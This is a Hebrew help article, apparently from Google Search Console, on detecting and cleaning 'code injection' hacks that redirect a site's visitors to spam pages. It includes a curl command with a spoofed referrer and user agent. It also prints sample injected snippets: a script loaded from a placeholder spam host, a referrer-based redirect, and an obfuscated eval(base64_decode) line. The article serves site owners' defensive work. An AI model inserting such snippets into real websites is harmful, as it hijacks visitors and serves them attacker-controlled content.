סוג פריצה: החדרת קוד

מה המשמעות של דפים המופיעים ב-Search Console עם סימון של סוג הפריצה לאתר "החדרת קוד"?

המשמעות היא שהאקר פגע באתר שלך והוא מפנה מחדש מבקרים מהאתר שלך לאתר הספאמי שלו. לעתים, רק משתמשים מסוימים יופנו מחדש, על סמך המיקום שלהם, האתר המפנה או המכשיר שבו הם משתמשים (לדוגמה, טלפון נייד). ייתכן שההאקר החדיר את הקוד הזדוני ישירות לקובצי ה-HTML של האתר (לדוגמה, כתובת אתר להפניה מחדש של JavaScript) או לקבצים שיוצרים את תוכן האתר שלך (לדוגמה, קובצי PHP). דרך נוספת שבה ההאקר יכול להפנות מחדש מבקרים היא על-ידי שינוי קובצי התצורה של השרת. קובצי תצורת השרת מאפשרים בדרך כלל למנהל האתר לציין כתובות אתר להפניה מחדש עבור דפים ספציפיים או ספריות ספציפיות באתר. לדוגמה, בשרתי ‎Apache, זהו הקובץ ‎.htaccess וכן הקובץ httpd.conf. (אם אינך יודע כיצד לבדוק את קובצי תצורת השרת, ראה שלב 2: בניית צוות תמיכה בתהליך השחזור המופיע בעזרה בנושא אתרים פרוצים.)

לקבלת מידע כללי נוסף על אתרים שנפגעו באמצעות ספאם, ראה שלב 5: הערכת הנזק (ספאם).

כיצד אוכל לחקור את כתובת האתר להפניה מחדש בדף זה?

תחילה, הימנע משימוש בדפדפן כדי להציג דפים שנפרצו באתר שלך. זאת משום שההאקרים מגדירים לעתים קרובות דפים להפניה מחדש בהתבסס על מאפייני משתמש כמו:

  • מיקום, שאותו אפשר להסיק בדרך כלל באמצעות כתובת ה-IP
  • הגורם המפנה, לדוגמה, דף תוצאות חיפוש
  • סוכן משתמש, לדוגמה, דפדפן במכשיר נייד או דפדפן פחות מאובטח

שקול לאשר במקום זאת את אופן הפעולה באמצעות השיטה הבאה:

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • שליפת דף עם קובץ תצורה של שרת שנפגע עלולה להחזיר את הכותרות הבאות:

    ...
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    לחלופין, בעת בדיקת התוכן של הדף המוחזר, ייתכן שתראה קוד שהוחדר שנראה כך:

    • JavaScript או שפת סקריפט אחרת הקוראת לסקריפטים מאתר ספאם ומריצה אותם: <script type='text/javascript' src='http://spam-site/js/x55.js'></script>
    • שפת סקריפט שמפנה מחדש את הדפדפן לאתר ספאם:
      
      <script>
      ‎if (document.referrer.match(/google\.com/)) {‎ window.location("http://spam-site/");‎ ‎ }‎ ‎</script>‎
    • קוד ספאמי מטושטש במטרה למנוע זיהוי:
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    חקור את כל קטעי הקוד החשודים האפשריים הקיימים באתר. ייתכן שיהיה זה מועיל לחפש מילים כמו "script" כדי לאתר קוד JavaScript. מילות מפתח שימושיות אחרות הן "eval",‏ "unescape" וכו'.

    כיצד אוכל לנקות את האתר שלי מסוג הפריצה "החדרת קוד"?

    כאשר אתה מוכן לניקוי האתר (שלב 7 בתהליך השחזור המופיע בעזרה בנושא אתרים פרוצים), תוכל להחליף את הקבצים הנגועים בגיבוי התקין האחרון, או שתוכל להסיר את החדרת הקוד מכל דף ומכל פונקציות או קובצי הסקריפט הקשורים. אם שינית קובצי תצורה של שרת, ייתכן שיהיה עליך להפעיל מחדש את שרת האינטרנט כדי שהשינויים ייכנסו לתוקף.

    לתשומת לבך, ניקוי סוג הפריצה "החדרת קוד" מועיל לשחזור אתר פרוץ, אך אינו מטפל בשורש הבעיה של נקודת התורפה שמלכתחילה אפשרה להאקר לפגוע באתר שלך. בלי לתקן את סיבת השורש, האתר שלך עלול להיחשף לפריצה נוספת בעתיד. אפשרות שימושית אחת, למשל, היא לעדכן את כל התוכנות שפועלות באתר שלך, לדוגמה, התקנה ישנה של WordPress. לקבלת מידע נוסף על ניקוי האתר כולו, ולא רק סוג זה של פריצה, ראה 'עזרה בנושא אתרים פרוצים', ועיין בנושא הספציפי "הערכת הנזק למערכת הקבצים" בשלב 5: הערכת הנזק (ספאם).

    האם המידע הועיל?
    איך נוכל לשפר את המאמר?